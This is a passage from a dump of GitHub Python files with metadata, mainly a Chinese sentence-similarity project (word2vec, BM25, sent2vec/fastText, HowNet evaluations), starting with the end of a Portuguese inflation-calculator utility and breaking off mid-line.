[s/n]\\033[m')).strip ().upper ()[0]\n if resp == 'N':\n print ('\\033[35mFIM DA CONSULTA!\\033[m')\n break\n" }, { "alpha_fraction": 0.5142095685005188, "alphanum_fraction": 0.5559502840042114, "avg_line_length": 24.88505744934082, "blob_id": "5a2d3736f2fe900316ad8326c640822391bec10b", "content_id": "7fb1201dffcb59f8bc078edbfadf0a4aba9e58d9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2261, "license_type": "permissive", "max_line_length": 94, "num_lines": 87, "path": "/inecv/uteis/uteis.py", "repo_name": "sergioalves20/TAI", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\n\n\ndef leiaint(msg):\n while True:\n try:\n ano = int (input (msg))\n except(ValueError, TypeError):\n print ('ERRO: digite um numero inteiro válido')\n continue\n except KeyboardInterrupt:\n print ('\\nInterrompido.')\n return 0\n else:\n return ano\n\n\ndef leiafloat(msg):\n while True:\n try:\n preco = float (input (msg))\n except(ValueError, TypeError):\n print ('ERRO: digite um numero inteiro ou decimal')\n continue\n except KeyboardInterrupt:\n print ('\\nInterrompido.')\n return 0\n else:\n return preco\n\n\nc = ('\\033[m', # 0 - Sem cor\n '\\033[30m', # 1 - Branco\n '\\033[31m', # 2 - Vermelho\n '\\033[32m', # 3 - Verde\n '\\033[33m', # 4 - Amarelo\n '\\033[34m', # 5 - Azul\n '\\033[35m', # 6 - Roxo\n '\\033[36m', # 7 - Magenta\n '\\033[37m') # 8 - Cinza\n\n\ndef linha(tam=0, cor=0):\n print (c[cor], '-' * tam)\n\n\ndef titulo(cor=0, msg=''):\n tam = len (msg)\n linha (tam, 5)\n print (c[cor], msg)\n linha (tam, 5, )\n print ('\\033[m')\n\n\ndef dados():\n # Importa o excel com o ano e a taxa de inflação anual\n df = pd.read_excel ('inecv/taxacv.xlsx', engine='openpyxl')\n\n # Altera o nome das 2 colunas\n df.rename (columns={'ano': 'Ano', 'taxa': 'Taxa'}, inplace=True)\n\n # Calcula e cria uma coluna 'Fator Conv.' (Fator de Conversão)\n df['Fator Conv.'] = 1 + df['Taxa'] / 100\n\n df = df.set_index ('Ano')\n\n df = df.loc[leiaint ('\\033[036mDigite o ano de referência do preço [1990/2020]:\\033[m '):]\n\n # Regista numa variável o valor a calcular e valida a operação\n preco = leiafloat ('\\033[036mDigite o valor inteiro ou decimal a calcular:\\033[m ')\n print ('')\n\n # Cria uma coluna 'Novo Valor' com valores nulos\n df['Novo Valor'] = np.nan\n\n # Anexa o Valor solicitado\n df['Novo Valor'] = preco\n\n pd.set_option ('display.precision', 2)\n # Calcula e anexa o Novo Valor\n df['Novo Valor'] = df['Novo Valor'] * df['Fator Conv.'].cumprod ()\n\n # Substitui os valores nulos pelo Novo Valor\n df['Novo Valor'] = df['Novo Valor'].ffill ()\n\n return df\n" } ]
3
eric-seekas/sentence_similarity
https://github.com/eric-seekas/sentence_similarity
456e29ecb53e63a6f0ab804acfc6e919e1a1458c
647e90b1c43ab838fe857f87d3a2d5364112ff9b
d5905c424264e9376fb80871749865140fbd3fb1
refs/heads/master
2021-02-08T18:20:45.443720
2018-05-22T10:50:17
2018-05-22T10:50:17
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5689594149589539, "alphanum_fraction": 0.585185170173645, "avg_line_length": 27.93877601623535, "blob_id": "63bfabb4aa5b09b3d949ef5e4cf268c0141ce2a0", "content_id": "9984027acd8b67f8cfacd02ec04b0dca15106798", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2909, "license_type": "no_license", "max_line_length": 87, "num_lines": 98, "path": "/gensim_sentence_similarity/gensim_sentence_similarity.py", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "# 基于gensim的n_similarity函数实现句子相似度计算\n\nimport pandas as pd\nimport numpy as np\nfrom gensim.models import Word2Vec\nimport time\nimport matplotlib.pyplot as plt\nimport json\n\nTEST_DATA_FILE = '/media/jlan/E/Projects/nlp/sentence_similarity/dataset/dataset.csv'\nEMBEDDING_FILE = '/media/jlan/E/Projects/nlp/sentence_similarity/dataset/w2v_model.bin'\ntest_file = '/media/jlan/E/Projects/nlp/crop_qa/data4/part/sim_qs_cut.json'\n\nmodel = Word2Vec.load(EMBEDDING_FILE)\n\ndef data_prepare(datafile):\n \"\"\"从文件中读取数据\"\"\"\n data = pd.read_csv(datafile)\n data = data.iloc[-3207:]\n sentences1 = data['sentence1'].values\n sentences2 = data['sentence2'].values\n labels = data['similarity'].values\n return sentences1, sentences2, labels\n\n\ndef sentence_most_similarity():\n data_dict = json.load(open(test_file, encoding='utf-8'))\n num_success = 0\n\n print(len(list(data_dict.keys())))\n\n for q in list(data_dict.keys()):\n predicts = []\n qs = list(data_dict.keys())\n qs.remove(q)\n\n for sent in qs:\n try:\n score = model.n_similarity(q.split(), sent.split())\n except Exception:\n score = 0\n # print('{}, {}, {}'.format(q, sent, score))\n predicts.append(score)\n\n print(predicts)\n\n max_inx = np.argmax(predicts, axis=0)\n sort_inx = np.argsort(predicts, axis=0)[::-1]\n print(sort_inx)\n print(max_inx)\n # for i in sort_inx[:10]:\n # print(\"t1: {}, t2: {}, score: {}\".\n # format(q, qs[i], predicts[i]))\n\n\n print('\\n' + q + ';' + qs[max_inx] + ';', predicts[max_inx])\n\n most_similarity_sentence = qs[max_inx]\n print('相似问题集:\\n', data_dict[q])\n print('预测结果:\\n', most_similarity_sentence)\n if most_similarity_sentence in data_dict[q]:\n print('预测正确')\n num_success += 1\n print('\\n')\n print(num_success)\n\n\ndef main():\n predicts = []\n sentences1, sentences2, labels = data_prepare(TEST_DATA_FILE)\n for sent1, sent2 in zip(sentences1, sentences2):\n try:\n score = model.n_similarity(sent1.split(), sent2.split())\n except Exception:\n score = 0\n print('{}, {}, {}'.format(sent1, sent2, score))\n predicts.append(score)\n\n print(labels)\n print(predicts)\n from sklearn.metrics import roc_curve, auc\n\n fpr, tpr, thresholds = roc_curve(labels, predicts)\n roc_auc = auc(fpr, tpr)\n plt.plot(fpr, tpr, 'b', label='AUC = %0.2f' % roc_auc)\n plt.plot([0, 1], [0, 1], 'r--')\n plt.xlim([0, 1])\n plt.ylim([0, 1])\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.show()\n\n\nif __name__ == '__main__':\n start = time.time()\n # main()\n sentence_most_similarity()\n print('run time: ', time.time() - start)" }, { "alpha_fraction": 0.7197604775428772, "alphanum_fraction": 0.7796407341957092, "avg_line_length": 56.58620834350586, "blob_id": "199fa6176f40601d41cfddb70cd4249afe9a0ee0", "content_id": "41961042c70245d44cc6f61415ee79303e1222a1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1670, "license_type": "permissive", "max_line_length": 304, 
"num_lines": 29, "path": "/mpcnn/README.md", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "# mpcnn\nTensorflow Implementation: Multi-Perspective Sentence Similarity Modeling with Convolutional Neural Networks\n\nThis project implement the network (slightly different) from the paper [Multi-Perspective Sentence Similarity Modeling with Convolutional Neural Networks](https://pdfs.semanticscholar.org/0f69/24633c56832b91836b69aedfd024681e427c.pdf?_ga=2.189917163.1125227972.1499913967-1950509983.1499913967)\n\n\n## Test\nTested on the training set of [Quora Question Pair](https://www.kaggle.com/c/quora-question-pairs/data)\n\n- word2vec word-embedding: 0.33621892 logloss\n- glove word-embedding: 0.3132183 logloss\n\n## Details/Problem\nAs the input of sentence has variable length, padding is usually used for creating tensor with same shape, which enables parallel computation and provides better computational locality. However, padding will affect the result of mean-pool and min-pool because there are lots of zeros added to the sample.\n\n- Mean pool:\n - Problem: direct use mean operation would include the padding zero\n - Solved by: sum(output of conv) / sentence_length_tensor\n- Min pool (not using in the code, to be improved):\n - Problem: min pool would always return zero due to padding zero\n - Not Exactly Same: use min(output_of_conv + min_mask)\n - Min_mask is 2d tensor. If t-th input is padding zero, then the t-th value of\n the mask is 1e7 (large value) such that the min pool value is less affected\n by padding sequence. (P.s. conv.layer using SAME padding method and\n the min pool value is not exact equal to that without padding\n sequence)\n\n## TO BE CONTINUED\n- extract and consolidate the code from the notebook into package\n" }, { "alpha_fraction": 0.5654281377792358, "alphanum_fraction": 0.6122778654098511, "avg_line_length": 16.714284896850586, "blob_id": "be5d4e860bd068c2fe69c1d3e75a132d3c2f5d21", "content_id": "0dc7755518c2ed9d1b240f6ada787436c7b6ead9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 623, "license_type": "no_license", "max_line_length": 56, "num_lines": 35, "path": "/sig_tan_relu.py", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "# !/usr/bin/python3\n\n# coding:utf8\n# @Author: Jlan\n# @Time: 18-4-8 上午10:35\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\ndef sigmod(x):\n return 1.0/(1.0+np.exp(-x))\n\ndef tanh(x):\n y = np.tanh(x)\n return y\n\ndef relu(x):\n y = x.copy()\n y[y<0]=0\n return y\n\nx = np.arange(-50.0,50.0,0.1)\ny_relu = relu(x)\ny_sigmod = sigmod(x)\ny_tanh = tanh(x)\n\nplt.plot(x,y_relu,c='r',label=\"Relu\",linestyle='--')\nplt.plot(x,y_sigmod,c='g',label=\"Sigmod\",linestyle='-.')\nplt.plot(x,y_tanh,c='b',label=\"Tanh\")\nplt.ylim([-1,4])\nplt.xlim([-4,4])\nplt.legend(loc=2)\nplt.savefig('sig_tan_relu.png')\nplt.show()" }, { "alpha_fraction": 0.5172771215438843, "alphanum_fraction": 0.527297854423523, "avg_line_length": 32.27586364746094, "blob_id": "6611b840d9e364e614452e4db07136e1523b10af", "content_id": "9489e1aec6f5e2f16f4816b7d051b0a9bef102d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3174, "license_type": "no_license", "max_line_length": 108, "num_lines": 87, "path": "/bm25/bm25.py", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "import os\nimport json\nimport math\nimport pandas as 
pd\nimport numpy as np\n\nDATA_DIR = '/media/jlan/E/Projects/nlp/crop_qa/data4'\nTRAIN_DATA_FILE = '/media/jlan/E/Projects/nlp/sentence_similarity/dataset/dataset.csv'\nTEST_FILE = os.path.join(DATA_DIR, '/media/jlan/E/Projects/nlp/sentence_similarity/dataset/test.txt') # 测试文件\n\n\ndef data_prepare(datafile):\n with open(datafile, 'r') as f:\n lines = [line.strip() for line in f.readlines()]\n return lines\n\nclass BM25(object):\n def __init__(self, docs):\n self.D = len(docs)\n self.avgdl = sum([len(doc) + 0.0 for doc in docs]) / self.D\n self.docs = docs\n self.f = [] # 列表的每一个元素是一个dict,dict存储着一个文档中每个词的出现次数\n self.df = {} # 存储每个词及出现了该词的文档数量\n self.idf = {} # 存储每个词的idf值\n self.k1 = 1.5\n self.b = 0.75\n self.init()\n\n def init(self):\n for doc in self.docs:\n tmp = {}\n for word in doc:\n tmp[word] = tmp.get(word, 0) + 1 # 存储每个文档中每个词的出现次数\n self.f.append(tmp)\n for k in tmp.keys():\n self.df[k] = self.df.get(k, 0) + 1\n for k, v in self.df.items():\n self.idf[k] = math.log(self.D - v + 0.5) - math.log(v + 0.5)\n\n def sim(self, doc, index):\n score = 0\n for word in doc:\n if word not in self.f[index]:\n continue\n d = len(self.docs[index])\n score += (self.idf[word] * self.f[index][word] * (self.k1 + 1)\n / (self.f[index][word] + self.k1 * (1 - self.b + self.b * d\n / self.avgdl)))\n return score\n\n def simall(self, doc):\n scores = []\n for index in range(self.D):\n score = self.sim(doc, index)\n scores.append(score)\n while True:\n most_sim_index = scores.index(max(scores))\n most_sim = self.docs[most_sim_index]\n if most_sim == doc:\n scores.remove(scores[most_sim_index])\n else:\n return most_sim\n\n\n def main(self):\n std_sim_dict = json.load(open(os.path.join(DATA_DIR, 'part/sim_qs_cut.json'), encoding='utf-8'))\n num_std_q = len(std_sim_dict) # 标准问题数量\n num_correct = 0 # 预测正确的数量\n\n for sentence in self.docs:\n print(sentence)\n most_sim = self.simall(sentence)\n print(most_sim)\n sims = std_sim_dict.get(sentence)\n print(sims)\n if sims: # 有的标准问题没有与之对应的相似问题\n if most_sim in sims: # 从相似问题预测出每一个标准问题中反向查找相似问题,如果找到该相似问题,则预测成功\n num_correct += 1\n print('num_correct:', num_correct)\n print('num_std_q:', num_std_q)\n print('accuracy: ', num_correct/num_std_q)\n\n\nif __name__ == '__main__':\n sentences = data_prepare(TEST_FILE)\n bm = BM25(sentences)\n bm.main()" }, { "alpha_fraction": 0.5252832174301147, "alphanum_fraction": 0.5369613170623779, "avg_line_length": 39.587677001953125, "blob_id": "66d6ac22159256e3b2501c3b5c62591bd924c39c", "content_id": "cc8ec0285ca5c9f62a107361f9308c698e08eb3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9311, "license_type": "no_license", "max_line_length": 124, "num_lines": 211, "path": "/dataset/sent2vec.py", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "import os\nimport subprocess\nimport jieba\nimport json\nfrom subprocess import call\n\n\nDATA_DIR = '/media/jlan/E/Projects/nlp/crop_qa/data4'\n# MODEL_DIR = os.path.join('/home/jlan/Projects/agri/crop_qa_web/app/sent2vec/model')\nGEN_MODEL_FILE = os.path.join(DATA_DIR, 'gen_rice_model.bin') # gensim生成的模型\n\nTRAIN_FILE = os.path.join(DATA_DIR, 'thu_train_file.txt')\n# TRAIN_FILE = '/home/jlan/Projects/nlp/数据集/thu_train_file.txt'\n# CORPORA = os.path.join(DATA_DIR, 'part/std_q_partial_cut.txt')\nCORPORA = os.path.join(DATA_DIR, 'part/sim_qs_cut.txt')\nCORPORA_DICT = os.path.join(DATA_DIR, 'qs.json')\n# TEST_FILE = os.path.join(DATA_DIR, 'part/sim_q_partial_cut.txt') # 测试文件\nTEST_FILE = 
os.path.join(DATA_DIR, 'part/test.txt') # 测试文件\n\n\n\nclass Sent2Vec:\n def __init__(self):\n self.fasttext = os.path.join(DATA_DIR, 'fasttext')\n self.model = os.path.join(DATA_DIR, 'rice_model.bin') # sen2vec生成的模型\n\n def train(self, input_file):\n # train_command = '{} sent2vec -input {} -output {} -minCount 8 -dim 700 -epoch 9 -lr 0.2 -wordNgrams 2 -loss ns ' \\\n # '-neg 10 -thread 20 -t 0.000005 -dropoutK 4 -minCountLabel 20 -bucket 4000000'\\\n # .format(self.fasttext, input_file, self.model)\n\n train_command = '{} sent2vec -input {} -output {}'.format(self.fasttext, input_file, self.model)\n print(train_command)\n call(train_command, shell=True)\n\n\n def cut_words(self, sentence):\n with open(os.path.join(DATA_DIR, 'stop_words.txt'), 'r') as f:\n stop_words = [word.strip() for word in f.readlines()if word.strip()]\n word_list = jieba.cut(sentence)\n word_list = [word.strip() for word in word_list if word.strip() and word.strip() not in stop_words]\n # word_list = [word.strip() for word in word_list if word.strip()] # 不去停用词\n return word_list\n\n\n def get_nnSent(self, corpora, test_file, k):\n \"\"\"\n 执行\"fasttext nnSent model.bin corpora.txt [k],找到相似句子\n \"\"\"\n test_command = '{} nnSent {} {} {} {}' \\\n .format(self.fasttext, self.model, corpora, test_file, k)\n result = subprocess.check_output(test_command, shell=True)\n result = result.decode('utf8')\n with open(os.path.join(DATA_DIR, 'part/result.txt'), 'w') as f:\n f.write(result)\n # result = result.split('\\n')[2:]\n # result = [i.split(',')[0].strip() for i in result if i.strip()]\n return result\n\n\n def nn_result_process(self, result):\n \"\"\"\n 通过nnSent初步配对相似问题和标准问题,后续再手动进一步处理\n :param result:\n :return:\n \"\"\"\n result = result.strip('\\nPre-computing sentence vectors... done.')\n result = result.split('\\n\\n')\n f = open(CORPORA_DICT, encoding='utf-8')\n q_dict = json.load(f)\n stan_sim = {}\n with open(os.path.join(DATA_DIR, 'stan_sim.txt'), 'w') as f:\n for res in result:\n qs = res.split('\\n')\n print(qs)\n stan_q = qs[0].strip()\n stan_q_o = q_dict.get(stan_q, '')\n stan_sim[stan_q_o] = []\n f.write(stan_q_o+'\\n')\n sim_qs = qs[2:] # qs[1]=qs[0]\n for sq in sim_qs:\n sqq, sqc = sq.split(',')\n sqq_o = q_dict.get(sqq.strip())\n if not sqq_o:\n print('sq:', sq)\n stan_sim[stan_q_o].append([sqq_o, sqc])\n f.write(sqq_o + '.....' 
+ sqc + '\\n')\n f.write('\\n')\n with open(os.path.join(DATA_DIR, 'stan_sim.json'), 'w', encoding='utf8') as json_file:\n json_file.write(json.dumps(stan_sim, ensure_ascii=False, indent=2))\n\n\n def sim_qs_distinct(self):\n f = open(os.path.join(DATA_DIR, 'stan_sim.json'), encoding='utf-8')\n sim_qs_dict = json.load(f)\n sim_qs_dict2 = sim_qs_dict.copy()\n for q, simqs in sim_qs_dict.items():\n for sq in simqs[:5]:\n # del sim_qs_dict2[sq[0]]\n sim_qs_dict2.pop(sq[0], None)\n print(len(sim_qs_dict))\n print(len(sim_qs_dict2))\n with open(os.path.join(DATA_DIR, 'stan_sim_distinct.json'), 'w', encoding='utf8') as json_file:\n json_file.write(json.dumps(sim_qs_dict2, ensure_ascii=False, indent=2))\n with open(os.path.join(DATA_DIR, 'stan_sim_distinct.txt'), 'w') as f:\n for k,vs in sim_qs_dict2.items():\n f.write(k+'\\n')\n for v in vs:\n f.write(v[0]+'.......'+v[1]+'\\n')\n f.write('\\n\\n')\n\n\n def search(self, text):\n \"\"\"\n :param text: 从django后端传过来的\n :return: 与text最相似的问题\n \"\"\"\n word_list = self.cut_words(text)\n with open(TEST_FILE, 'w') as f:\n f.write(' '.join(word_list))\n result = self.get_nnSent(CORPORA, TEST_FILE, k=3)\n f = open(CORPORA_DICT, encoding='utf-8')\n q_dict = json.load(f)\n result_id = [q_dict.get(i) for i in result]\n return result, result_id\n\n\n def compute_precision(self, result, k):\n std_sim_dict = json.load(open(os.path.join(DATA_DIR, 'part/std_sim_partial_dict_cut.json'), encoding='utf-8'))\n num_std_q = len(std_sim_dict) # 标准问题数量\n num_sim_q = sum([len(i) for i in std_sim_dict.values()]) # 相似问题数量,一个标准问题可能对应多个相似问题\n num_correct = 0 # 预测正确的数量\n\n # 从get_nnSent函数生成的结果中读取,每k+1行为一个单元,第一行是相似问题,后k行是找出的最接近的k个标准问题\n with open(result, 'r') as f:\n lines = [line.strip() for line in f.readlines()[1:] if line.strip()]\n results_each = [lines[i:i+k+1] for i in range(0, len(lines), k+1)]\n num_sim_q2 = len(results_each)\n print('results_each', results_each)\n\n for result_each in results_each:\n sim_q = result_each[0] # 相似问题\n std_qs = [v.split(',')[0].strip() for v in result_each[1:]] # 预测出的标准问题\n # print('sim: ', sim_q)\n # print(std_qs)\n find = False\n # print('std_qs', std_qs)\n for j in range(k):\n sims = std_sim_dict.get(std_qs[j])\n if sims: # 有的标准问题没有与之对应的相似问题\n if sim_q in sims: # 从相似问题预测出每一个标准问题中反向查找相似问题,如果找到该相似问题,则预测成功\n num_correct += 1\n find = True\n # print('success predict std: ', std_qs)\n break\n if not find:\n print('sim: ', sim_q)\n print('failure predict std: ', std_qs)\n print('num_correct:', num_correct)\n print('num_std_q:', num_std_q)\n print('num_sim_q:', num_sim_q)\n print('num_sim_q2:', num_sim_q2)\n print('accuracy: ', num_correct/num_sim_q)\n\n\n def compute_precision2(self, result, k):\n std_sim_dict = json.load(open(os.path.join(DATA_DIR, 'part/sim_qs_cut.json'), encoding='utf-8'))\n num_std_q = len(std_sim_dict) # 标准问题数量\n num_sim_q = sum([len(i) for i in std_sim_dict.values()]) # 相似问题数量,一个标准问题可能对应多个相似问题\n num_correct = 0 # 预测正确的数量\n\n # 从get_nnSent函数生成的结果中读取,每k+1行为一个单元,第一行是相似问题,后k行是找出的最接近的k个标准问题\n with open(result, 'r') as f:\n lines = [line.strip() for line in f.readlines()[1:] if line.strip()]\n results_each = [lines[i:i+k+1] for i in range(0, len(lines), k+1)]\n num_std_q2 = len(results_each)\n\n for result_each in results_each:\n std_q = result_each[0] # 问题\n sim_qs = [v.split(',')[0].strip() for v in result_each[2:]] # 计算出的与之相似的问题\n find = False\n for j in range(k-1):\n sims = std_sim_dict.get(std_q)\n if sims: # 有的标准问题没有与之对应的相似问题\n if sim_qs[j] in sims: # 从相似问题预测出每一个标准问题中反向查找相似问题,如果找到该相似问题,则预测成功\n num_correct += 1\n find 
= True\n break\n if not find:\n print('std: ', std_q)\n print('predict sims: ', sim_qs)\n print('correct sims: ', sims)\n print('\\n')\n print('num_correct:', num_correct)\n print('num_std_q:', num_std_q)\n print('num_sim_q:', num_sim_q)\n print('num_std_q2:', num_std_q2)\n print('accuracy: ', num_correct/num_std_q2)\n\n\nif __name__ == '__main__':\n s2v = Sent2Vec()\n # s2v.train(TRAIN_FILE)\n k = 2\n\n result = s2v.get_nnSent(CORPORA, TEST_FILE, k)\n # s2v.nn_result_process(result)\n\n # sim_qs_distinct()\n\n s2v.compute_precision2(os.path.join(DATA_DIR, 'part/result.txt'), k)" }, { "alpha_fraction": 0.5550122261047363, "alphanum_fraction": 0.5727384090423584, "avg_line_length": 35.55307388305664, "blob_id": "002cde78d17a1e95255b5b67cb46a2245fa0e2cf", "content_id": "1b15bf300effd1bcab5de4cc997c52fcf69395c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7170, "license_type": "no_license", "max_line_length": 112, "num_lines": 179, "path": "/gensim_sentence_similarity/gen_sen2vec.py", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "# 首先使用word2vec对句子中的词语向量化,然后加和求平均作为句子向量,最后计算句子相似度\n\nimport os\nimport jieba\nimport json\nimport numpy as np\nfrom functools import reduce\nfrom gensim.models import Word2Vec\n\n\nDATA_DIR = os.path.join('/media/jlan/E/Projects/nlp/crop_qa/data4')\n# MODEL_DIR = os.path.join('/home/jlan/Projects/agri/crop_qa_web/app/sent2vec/model')\nGEN_MODEL_FILE = os.path.join(DATA_DIR, 'gen_thu_rice_model.bin') # gensim生成的模型\nAGRI_WORDS = os.path.join(DATA_DIR, 'agri_words.txt') # 农业领域词典\n\nTRAIN_FILE = os.path.join(DATA_DIR, 'train.txt')\n# TRAIN_FILE = '/home/jlan/Projects/nlp/数据集/thu_train_file.txt'\nCORPORA = os.path.join(DATA_DIR, 'part/test.txt')\nCORPORA_DICT = os.path.join(DATA_DIR, 'qs.json')\nTEST_FILE = os.path.join(DATA_DIR, 'part/test.txt') # 测试文件\n\n# jieba.load_userdict(AGRI_WORDS)\n\nclass MySentences(object):\n def __init__(self, filename):\n self.filename = filename\n\n def __iter__(self):\n for line in open(self.filename, encoding='utf8', errors='ignore'):\n yield line.split()\n\n\nclass GenS2V:\n def __init__(self):\n # self.model = Word2Vec.load(GEN_MODEL_FILE)\n pass\n\n def train(self):\n sentences = MySentences('/media/jlan/E/Projects/nlp/数据集/thu_rice.txt') # a memory-friendly iterator\n model = Word2Vec(sentences, size=100, window=5, min_count=5, workers=4)\n model.save(GEN_MODEL_FILE)\n return model\n\n def cut_words(self, sentence):\n with open(os.path.join(DATA_DIR, 'stop_words2.txt'), 'r') as f:\n stop_words = [word.strip() for word in f.readlines() if word.strip()]\n word_list = jieba.cut(sentence)\n word_list = [word.strip() for word in word_list if word.strip() and word.strip() not in stop_words]\n # word_list = [word.strip() for word in word_list if word.strip()] # 不去停用词\n return word_list\n\n def s2v(self, word_list):\n \"\"\"\n :param sentence: 输入一个句子\n :return: 该句子的句向量\n 算法重点创新的地方\n \"\"\"\n # sent_vec = reduce(lambda x,y: np.add(x,y), [self.model.wv[word] for word in word_list])/len(word_list)\n result_vec = np.zeros(100)\n sent_len = len(word_list)\n for word in word_list:\n try:\n word_vec = self.model.wv[word]\n except Exception:\n sent_len -= 1\n else:\n result_vec += word_vec/np.linalg.norm(word_vec)\n sent_vec = result_vec/sent_len\n return sent_vec\n\n def compute_similarity(self, vec1, vec2):\n \"\"\"\n 计算两个向量的余弦值\n :param vec1:\n :param vec2:\n :return:\n \"\"\"\n num = np.dot(vec1,vec2) # 若为行向量则 A * B.T\n denom = np.linalg.norm(vec1) * 
np.linalg.norm(vec2)\n cos = num / denom # 余弦值\n # sim = 0.5 + 0.5 * cos # 归一化\n # print(cos)\n # print(sim)\n return cos\n\n def std_qs_vec(self, crop):\n with open(crop, 'r') as f:\n lines = f.readlines()\n words_vec_dict = {}\n for line in lines:\n line = line.strip()\n vec = self.s2v(line.split())\n words_vec_dict[line] = vec\n # with open(os.path.join(DATA_DIR, 'part/gen_words_vec_dict.json'), 'w', encoding='utf8') as json_file:\n # json_file.write(json.dumps(words_vec_dict, ensure_ascii=False, indent=2))\n return words_vec_dict\n\n def get_nn_sent(self, words_vec, words_vec_dict, k):\n \"\"\"\n 从words_vec_dict中找与words_vec最相似的前k个\n :param words_vec: 要找与其相似的句子的向量\n :param words_vec_dict: 存储了{句子: 句向量}\n :param k: 前k个最相似\n :return: 前k个最相似的句子和相似值\n \"\"\"\n similarity_sents = {}\n for q, v in words_vec_dict.items():\n cos = self.compute_similarity(words_vec, v)\n similarity_sents[q] = cos\n sorted_results = sorted(similarity_sents.items(), key=lambda item: item[1], reverse=True) # 按cos值对字典排序\n # print(sorted_results[:k])\n return sorted_results[1:k+1]\n\n def compute_precision(self, k=1):\n nn_sents_result = json.load(open(os.path.join(DATA_DIR, 'part/gen_nn_sents.json'), encoding='utf-8'))\n std_sim_dict = json.load(open(os.path.join(DATA_DIR, 'part/sim_qs_cut.json'), encoding='utf-8'))\n num_std_q = len(nn_sents_result) # 相似问题数量,一个标准问题可能对应多个相似问题\n num_correct = 0 # 预测正确的数量\n\n for std_q, sim_qs in nn_sents_result.items():\n find = False\n print(std_q)\n print(sim_qs)\n # print('std_qs', std_qs)\n sims = std_sim_dict.get(std_q)\n for sim_q in sim_qs[:k]:\n if sim_q[0].strip() in sims: # 从相似问题预测出每一个标准问题中反向查找相似问题,如果找到该相似问题,则预测成功\n num_correct += 1\n find = True\n # print('success predict std: ', std_qs)\n break\n if not find:\n print('std: ', std_q)\n print('predict sims: ', sim_qs)\n print('correct sims: ', sims)\n print('num_correct:', num_correct)\n print('num_sim_q:', num_std_q)\n print('accuracy: ', num_correct/num_std_q)\n return num_correct/num_std_q\n\n def main(self):\n sents_vec_dict = self.std_qs_vec(CORPORA)\n # print(sents_vec_dict)\n # f = open(CORPORA_DICT, encoding='utf-8')\n # words_vec_dict = json.load(f)\n with open(TEST_FILE, 'r') as f1:\n lines = f1.readlines()\n nn_sents_result = {}\n for line in lines:\n line = line.strip()\n sent_vec = self.s2v(line.split())\n nn_sents = self.get_nn_sent(sent_vec, sents_vec_dict, 9)\n nn_sents_result[line] = nn_sents\n with open(os.path.join(DATA_DIR, 'part/gen_nn_sents.json'), 'w', encoding='utf8') as json_file:\n json_file.write(json.dumps(nn_sents_result, ensure_ascii=False, indent=2))\n self.compute_precision()\n\n\n\nif __name__ == '__main__':\n gs2v = GenS2V()\n gs2v.train()\n # sent1 = '编写史记的人受到了什么处罚'\n # sent2 = '司马迁收到了什么刑罚'\n # words1 = gs2v.cut_words(sent1)\n # words2 = gs2v.cut_words(sent2)\n # vec1 = gs2v.s2v(words1)\n # vec2 = gs2v.s2v(words2)\n # gs2v.compute_similarity(vec1, vec2)\n # sents_vec_dict = gs2v.std_qs_vec(CORPORA)\n # gs2v.get_nn_sent(words1, sents_vec_dict, 3)\n\n # gs2v.main()\n # gs2v.compute_precision(9)\n\n# sim: 稻鸭共作 鸭子 的 作用 是\n# failure predict std: [('水稻纹枯病 的 菌核 是 怎么 形成 的', 0.86038722664756473)]\n# sim: 水稻 已经 发生 稻曲病 用 什么 药物 防治 最佳\n# failure predict std: [('水稻 稻曲病 在 水稻 什么 时期 防治 最好', 0.86975828631826579)]\n\n" }, { "alpha_fraction": 0.538665235042572, "alphanum_fraction": 0.5990465879440308, "avg_line_length": 30.483333587646484, "blob_id": "f120fdedcef41c629f773ac53f8f0f2082c473d9", "content_id": "d51c190fe948a58fb64a83aae5aff37d3456207c", "detected_licenses": [], "is_generated": false, "is_vendor": 
false, "language": "Python", "length_bytes": 1916, "license_type": "no_license", "max_line_length": 170, "num_lines": 60, "path": "/hownet/similarity_hownet.py", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nfrom hownet import similar_sentence\nimport time\nimport matplotlib.pyplot as plt\n\nTRAIN_DATA_FILE = '/media/jlan/E/Projects/nlp/sentence_similarity/dataset/dataset.csv'\n\n\ndef data_prepare(datafile):\n data = pd.read_csv(datafile)\n data = data.iloc[-3207:]\n sentences1 = data['sentence1'].values\n sentences2 = data['sentence2'].values\n labels = data['similarity'].values\n return sentences1, sentences2, labels\n\n\ndef main():\n predicts = []\n sentences1, sentences2, labels = data_prepare(TRAIN_DATA_FILE)\n for sent1, sent2 in zip(sentences1, sentences2):\n score = similar_sentence(sent1.split(), sent2.split())\n print('{}, {}, {}'.format(sent1, sent2, score))\n predicts.append(score)\n\n from sklearn.metrics import roc_curve, auc\n fpr, tpr, thresholds = roc_curve(labels, predicts)\n roc_auc = auc(fpr, tpr)\n plt.plot(fpr, tpr, 'b', label='AUC = %0.2f' % roc_auc)\n plt.plot([0, 1], [0, 1], 'r--')\n plt.xlim([0, 1])\n plt.ylim([0, 1])\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.show()\n print(predicts)\n\n # thresholds = [i / 100 for i in range(10, 90)]\n # # thresholds = [0.65, 0.66, 0.67, 0.68, 0.69, 0.7, 0.71, 0.72, 0.73, 0.74, 0.75, 0.76, 0.77, 0.78, 0.79, 0.80, 0.81, 0.82, 